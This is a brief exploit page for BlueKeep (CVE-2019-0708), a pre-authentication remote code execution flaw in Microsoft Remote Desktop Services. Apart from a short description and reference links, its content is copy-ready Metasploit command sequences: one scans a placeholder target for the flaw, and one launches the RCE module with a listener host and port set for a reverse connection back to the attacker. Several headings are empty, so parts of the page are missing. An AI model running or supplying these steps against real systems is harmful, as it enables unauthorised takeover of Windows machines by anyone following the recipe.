Exploit for Microsoft Remote Desktop Services - Unauthenticated Remote Code Execution (BlueKeep, CVE-2019-0708)

Description:

A remote code execution vulnerability exists in Remote Desktop Services, formerly known as Terminal Services, when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Remote Desktop Services Remote Code Execution Vulnerability’.

Affected Products:

Proof of Concept

PoC exploit

Metasploit Module

Check with Metasploit

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS YOUR_TARGET
set THREADS 25
run

Exploit with Metasploit

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS YOUR_TARGET
set LHOST eth0
set LPORT 1337
run

References:

https://nvd.nist.gov/vuln/detail/CVE-2019-0708
https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2019-0708
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.md